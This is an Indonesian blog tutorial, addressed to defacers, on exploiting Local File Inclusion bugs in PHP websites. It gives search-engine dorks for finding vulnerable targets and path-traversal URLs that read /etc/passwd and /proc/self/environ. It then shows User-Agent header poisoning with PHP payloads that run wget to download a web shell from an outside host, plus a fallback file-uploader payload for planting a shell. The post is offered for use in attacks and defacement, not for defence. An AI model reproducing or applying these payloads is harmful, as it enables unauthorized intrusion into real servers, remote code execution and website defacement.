Home Top Ad

cara memanfaatkan bug LFI dan cara upload shell methode Lfi full tutorial !

Share:


Azharbase.blogspot.com - hello akang-akang bug hunter sama defacer kali ini saya mau sharing lagi, tapi kali ini tentang Lfi, eh min Lfi itu apa ? Terus cara deface nya gimana ?, cara exploit nya gimana ?, santuy gw akan rangkum pada artikel satu ini jadi simak baik-baik, gw akan jelasin sedikit tentang pengertian LFi

•Apa itu LFI ?

LFI atau (Local File Inclusion) adalah sebuah bug pada site dimana kita bisa mengakses semua file di dalam server hanya dengan melalui URL.

•contoh dan cara memanfaatkan bug local file in lusion (LFI)

Hal yang pertama dilakukan seperti teknik-teknik lainnya adalah kita terlebih dahulu coba temukan website yang vulnerable terhadap serangan LFI.

Dork :
- inurl:/include/new-visitor.inc.php?lvc_include_dir=
- inurl:/_functions.php?prefix= inurl:/cpcommerce/_functions.php?prefix=
- inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

Mau yang fresh ? Use your brain racik dork nya sendiri :"v

Oke kita ambil contoh saja

Contoh: http://site.com/info.php?file=anjay.php

Nah selanjutnya kita ganti saja yang anjay.php dengan "../../../".

Lalu kita akan mendapatkan error seperti berikut contoh nya :

Contoh: http://site.com/info.php?file=../../../

Mendapatkan error: Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

Dengan begitu kita mempunyai kesempatan besar untuk memanfaatkan bug tersebut yaitu (LFI), selanjutnya kita coba temukan /etc/passwd
Seperti berikut

Contoh: http://site.com/info.php?file=etc/passwd

Tetapi kita masih mendapatkan error seperti ini :

Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

Terus gimana min cara agar bisa kita depes ?, sans Ez kok tinggal naikan saja direktori nya dengan cara :

contoh : http://site.com/info.php?file=../../../../../../../../../etc/passwd

Anjay ternyata berhasil lurr mendapatkan file /etc/passwd nya hasil nya akan muncul seperti berikut :

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin

Selanjutnya mari kita cek dengan /proc/self/environ apakah kita bisa mengakses nya hmm ?

Contoh: http://site.com/info.php?file=../../../../../../../../../proc/self/environ

Jika kalian setelah menambahkan /proc/self/environ muncul seperti ini :

DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac
HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD= GET REQUEST_URI = /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80

Maka ternyata /proc/self/environ bisa di akses lurrr !!

Jika kalau yang muncul tidak ada apa-apa melainkan (BLANK) maka tidak dapat di akses atau mungkin juga beroperating system *BSD

Sekarang kita tinggal injeksi dengan malicious dengan cara meracuni http header nya, bagaimana cara menginjeksi nya ? Gampang lur kita bisa menggunakan tamper data pada firefox addon, kalau kalian tidak punya kalian download dan install terlebih dahulu oke !

Kalau sudah install dan sudah punya buka tamper data firefox nya lalu masukan url yang tadi /proc/self/environ
 "http://site.com/info.php?file=../../../../../../../../../proc/self/environ"

Lalu pada user-agent isikan dengan kode berikut :

<?system('wget http://r57.gen.tr/c100.txt -O shell.php');?>

Atau

<?exec('wget http://r57.gen.tr/c100.txt -O shell.php');?>

Lalu sumbit gan !

Jika berhasik tinggal panggil aja shell nya dengan cara :

site.com/shell.php

Banyak kasus fungsi system di server di matikan sehingga kita tidak bisa melakukan wget gayn :(

Tapi tenang ada solusinya, yaitu dengan cara pada user-agent masukan script uploader seperti berikut :

<?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p> <h1> shu </h1></p> <br> <form action="" method="post" enctype="multipart/form-data"> Filename: <input type="file" name="file" /><input type="submit" value="Submit" /><br>

Setelah di upload shell akan terletak di bagian root path domain

Oke semuanya sudah saya sampaikan maaf bila ada kesalahan ataupun kata-kata kurang di mengerti ya maaf :"v

Akhir kata: belajar yang giat nanti akan dapat kimi hime :"vvvv

See you in the next time

Kalian bisa request mau sharing tentang apa, silahkan berkomentar di bawah ini gan !

2 comments:

About Me

My photo
Saya hanya seorang Bocil nub berumur 15 tahun yg gemar pelajaran IT 😉

Search This Blog

Komentar